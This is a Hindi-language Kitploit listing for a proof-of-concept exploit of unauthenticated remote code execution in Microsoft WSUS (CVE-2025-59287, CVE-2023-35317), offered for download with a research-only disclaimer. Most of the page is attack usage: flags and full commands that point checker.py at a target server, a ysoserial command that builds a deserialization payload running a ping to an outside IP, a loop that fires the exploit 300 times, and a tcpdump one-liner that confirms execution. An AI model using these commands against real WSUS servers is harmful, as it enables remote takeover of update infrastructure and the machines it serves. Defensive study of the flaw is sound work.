Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-59287-PoC — Microsoft Windows Server Update Service (WSUS) में प्रमाणीकरण रहित RCE PoC - CVE-2025-59287 और CVE-2023-35317 | Kitploit
उपकरण/GitHubGitHub/m507/cve-2025-59287-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubm507/cve-2025-59287-poc

CVE-2025-59287-PoC

Microsoft Windows Server Update Service (WSUS) में प्रमाणीकरण रहित RCE PoC - CVE-2025-59287 और CVE-2023-35317

रिपॉजिटरी देखें
1438 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-59287 / CVE-2023-35317 PoC (प्रूफ-ऑफ-कॉन्सेप्ट)

CVE-2025-59287 के अंतर्गत: WSUS में SoapFormatter RCE: https://shellcode.blog/wsus-cve-2025-59287-investigation/

यह सॉफ़्टवेयर पूरी तरह से अकादमिक अनुसंधान और प्रभावी बचाव तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, तथा इसका उपयोग सिस्टम पर हमला करने के लिए नहीं किया जाना चाहिए, जब तक कि स्पष्ट रूप से अधिकृत न किया गया हो। परियोजना के अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

उपयोग

आवश्यक फ़्लैग्स:

  • --target-url – लक्ष्य WSUS सर्वर का बेस URL, उदा. http://WIN-246JC0TE3BB.vuln.local:8530
  • --cve – CVE-2023-35317 या CVE-2025-59287 में से एक

वैकल्पिक फ़्लैग्स:

  • --dns-name – SOAP अनुरोधों में उपयोग किया जाने वाला क्लाइंट DNS नाम (डिफ़ॉल्ट: bugcrowd.local)
  • --random – --dns-name के आगे एक यादृच्छिक उपडोमेन जोड़ता है ताकि प्रत्येक रन एक नए क्लाइंट के रूप में दिखे
  • --payload – कस्टम बेस64-एन्कोडेड ysoserial पेलोड; यदि छोड़ दिया जाता है, तो चयनित --cve के लिए एक अंतर्निहित पेलोड का उपयोग किया जाता है
  • --debug – विस्तृत डीबग लॉगिंग सक्षम करें ([DEBUG] पंक्तियाँ)

CVE-2025-59287

  1. python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --random

alt text

मैन्युअल ट्रिगर – CVE-2023-35317

  1. (वैकल्पिक) Ysoserial.Net का उपयोग करके एक पेलोड जनरेट करें यदि आप अंतर्निहित पेलोड का उपयोग नहीं करना चाहते (या अंतर्निहित पेलोड पर भरोसा करना चाहते हैं)।
  2. चलाएँ: python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random
  3. WSUS कंसोल खोलें

alt text

स्वचालित ट्रिगर – CVE-2023-35317

  1. ./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (या --cve CVE-2023-35317 के लिए अंतर्निहित पेलोड पर भरोसा करें)
  2. for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;done
  3. 1-3 मिनट प्रतीक्षा करें और यह सेवा की प्रक्रिया के अंतर्गत स्पॉन हो जाएगा।
  4. icmp कनेक्शन की निगरानी करें: sudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done

alt text

टूल डाउनलोड करें